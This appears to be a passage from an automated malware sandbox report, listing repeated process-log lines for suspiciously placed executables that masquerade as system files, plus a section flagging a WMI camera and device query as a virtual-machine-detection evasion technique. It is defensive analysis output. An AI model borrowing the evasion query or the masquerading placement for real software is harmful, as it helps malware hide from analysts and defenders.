Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\spoolsv.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
